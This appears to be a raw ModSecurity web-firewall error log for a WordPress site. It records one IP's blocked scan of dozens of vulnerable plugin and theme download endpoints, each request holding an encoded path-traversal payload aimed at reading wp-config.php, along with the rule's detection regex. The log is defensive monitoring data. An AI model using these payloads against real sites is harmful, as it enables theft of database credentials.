"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-includes/plugins/wp-mobile-detector/resize.php?src=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-includes/plugins/wp-mobile-detector/resize.php"] [unique_id "YtsdK3hurfgLch3PImzIyQAAANI"] [Fri Jul 22 16:56:59.234070 2022] [:error] [pid 22470:tid 140017032701696] [client 72.11.157.116:52628] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"] [unique_id "YtsdK3xqqtgWgIAXsGFh1AAAAA0"] [Fri Jul 22 16:56:59.327302 2022] [:error] [pid 22471:tid 140016999130880] [client 72.11.157.116:52630] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?mdocs-img-preview=..%2F..%2F..-%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "YtsdK-CtYZwatdwcM8WrGQAAAFE"] [Fri Jul 22 16:56:59.422130 2022] [:error] [pid 23081:tid 140016940381952] [client 72.11.157.116:52632] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "YtsdK3hurfgLch3PImzIygAAANg"] [Fri Jul 22 16:56:59.512809 2022] [:error] [pid 22472:tid 140016982345472] [client 72.11.157.116:52638] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "YtsdKypbG8_UBGXeM63xbQAAAJM"] [Fri Jul 22 16:56:59.630538 2022] [:error] [pid 22472:tid 140017057879808] [client 72.11.157.116:52640] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "YtsdKypbG8_UBGXeM63xbgAAAIo"] [Fri Jul 22 16:56:59.721752 2022] [:error] [pid 22472:tid 140016973952768] [client 72.11.157.116:52642] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "YtsdKypbG8_UBGXeM63xbwAAAJQ"] [Fri Jul 22 16:56:59.814280 2022] [:error] [pid 22472:tid 140017099843328] [client 72.11.157.116:52644] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sell-downloads/sell-downloads.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F.%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sell-downloads/sell-downloads.php"] [unique_id "YtsdKypbG8_UBGXeM63xcAAAAIU"] [Fri Jul 22 16:56:59.916807 2022] [:error] [pid 22472:tid 140016965560064] [client 72.11.157.116:52646] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "YtsdKypbG8_UBGXeM63xcQAAAJU"] [Fri Jul 22 16:57:00.017945 2022] [:error] [pid 22472:tid 140017133414144] [client 72.11.157.116:52648] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-uploader/upload.php?destinations=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-uploader/upload.php"] [unique_id "YtsdLCpbG8_UBGXeM63xcgAAAIE"] [Fri Jul 22 16:57:00.108532 2022] [:error] [pid 23081:tid 140017007523584] [client 72.11.157.116:52650] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "YtsdLHhurfgLch3PImzIywAAANA"] [Fri Jul 22 16:57:00.207788 2022] [:error] [pid 23081:tid 140017057879808] [client 72.11.157.116:52652] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "YtsdLHhurfgLch3PImzIzAAAAMo"] [Fri Jul 22 16:57:00.298096 2022] [:error] [pid 23081:tid 140017091450624] [client 72.11.157.116:52654] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "YtsdLHhurfgLch3PImzIzQAAAMY"] [Fri Jul 22 16:57:00.388923 2022] [:error] [pid 23081:tid 140017141806848] [client 72.11.157.116:52656] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-swimteam/include/user/download.php?file=..%2F..%2Fwp-config.php&filename=..%2F..%2Fwp-config.php&contenttype=text%2Fhtml&transient=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "YtsdLHhurfgLch3PImzIzgAAAMA"] [Fri Jul 22 16:57:00.482946 2022] [:error] [pid 23081:tid 140017024308992] [client 72.11.157.116:52658] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "YtsdLHhurfgLch3PImzIzwAAAM4"] [Fri Jul 22 16:57:00.573738 2022] [:error] [pid 23081:tid 140017116628736] [client 72.11.157.116:52660] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/rb-agency/ext/forcedownload.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/rb-agency/ext/forcedownload.php"] [unique_id "YtsdLHhurfgLch3PImzI0AAAAMM"] [Fri Jul 22 16:57:04.073012 2022] [:error] [pid 22471:tid 140016973952768] [client 72.11.157.116:52672] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "YtsdMOCtYZwatdwcM8WrGgAAAFQ"] [Fri Jul 22 16:57:04.169466 2022] [:error] [pid 22470:tid 140016982345472] [client 72.11.157.116:52674] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/document_manager/views/file_download.php?fname=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/document_manager/views/file_download.php"] [unique_id "YtsdMHxqqtgWgIAXsGFh1QAAABM"] [Fri Jul 22 16:57:04.259505 2022] [:error] [pid 22472:tid 140017024308992] [client 72.11.157.116:52676] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "YtsdMCpbG8_UBGXeM63xdAAAAI4"] [Fri Jul 22 16:57:04.410466 2022] [:error] [pid 22471:tid 140016948774656] [client 72.11.157.116:52678] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "YtsdMOCtYZwatdwcM8WrGwAAAFc"] [Fri Jul 22 16:57:06.313616 2022] [:error] [pid 23081:tid 140017099843328] [client 72.11.157.116:52688] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "YtsdMnhurfgLch3PImzI1wAAAMU"] [Fri Jul 22 16:57:06.413170 2022] [:error] [pid 22471:tid 140017091450624] [client 72.11.157.116:52690] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dilima/pic.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dilima/pic.php"] [unique_id "YtsdMuCtYZwatdwcM8WrHQAAAEY"] [Fri Jul 22 16:57:06.522896 2022] [:error] [pid 23081:tid 140016999130880] [client 72.11.157.116:52692] [client 